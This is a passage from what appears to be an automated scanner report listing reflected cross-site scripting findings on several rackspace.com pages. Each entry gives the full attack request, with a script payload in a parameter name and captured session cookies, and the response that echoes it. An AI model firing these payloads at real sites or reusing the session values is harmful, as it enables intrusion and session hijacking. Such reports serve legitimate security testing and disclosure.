s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... utton('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/proservices/sharepoint.php?22c4c"><script>alert(1)</script>ce8be8e7e0a=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.170. http://www.rackspace.com/managed_hosting/services/security/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/services/security/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aaa7"><script>alert(1)</script>0cad41b1b9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/security/index.php?2aaa7"><script>alert(1)</script>0cad41b1b9a=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/security/index.php?2aaa7"><script>alert(1)</script>0cad41b1b9a=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.171. http://www.rackspace.com/managed_hosting/services/storage/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/services/storage/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eec7e"><script>alert(1)</script>02a979d343b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/services/storage/index.php?eec7e"><script>alert(1)</script>02a979d343b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ck_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/services/storage/index.php?eec7e"><script>alert(1)</script>02a979d343b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.172. http://www.rackspace.com/managed_hosting/support/customers/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/support/customers/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 637f5"><script>alert(1)</script>4561d53e9ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/customers/index.php?637f5"><script>alert(1)</script>4561d53e9ea=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/customers/index.php?637f5"><script>alert(1)</script>4561d53e9ea=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.173. http://www.rackspace.com/managed_hosting/support/dedicatedteam.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/support/dedicatedteam.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89fc7"><script>alert(1)</script>6af212d1899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/dedicatedteam.php?89fc7"><script>alert(1)</script>6af212d1899=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ack_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/dedicatedteam.php?89fc7"><script>alert(1)</script>6af212d1899=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.174. http://www.rackspace.com/managed_hosting/support/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/support/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15524"><script>alert(1)</script>b65bab80c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/index.php?15524"><script>alert(1)</script>b65bab80c3=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... lick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/index.php?15524"><script>alert(1)</script>b65bab80c3=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.175. http://www.rackspace.com/managed_hosting/support/promise.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/support/promise.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb89"><script>alert(1)</script>c2024b40a5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/promise.php?5eb89"><script>alert(1)</script>c2024b40a5b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ck="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/promise.php?5eb89"><script>alert(1)</script>c2024b40a5b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.176. http://www.rackspace.com/managed_hosting/support/servicelevels/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/support/servicelevels/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 702b0"><script>alert(1)</script>b9215bfd26e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/support/servicelevels/index.php?702b0"><script>alert(1)</script>b9215bfd26e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... at_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/support/servicelevels/index.php?702b0"><script>alert(1)</script>b9215bfd26e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.177. http://www.rackspace.com/managed_hosting/websites/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/managed_hosting/websites/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 506cc"><script>alert(1)</script>9f391e95dee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_hosting/websites/index.php?506cc"><script>alert(1)</script>9f391e95dee=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/managed_hosting/websites/index.php?506cc"><script>alert(1)</script>9f391e95dee=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42a8503e776f91e0e5','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.178. http://www.rackspace.com/openstack/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/openstack/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6332"><script>alert(1)</script>5c0ff8b0e84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /openstack/?f6332"><script>alert(1)</script>5c0ff8b0e84=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; 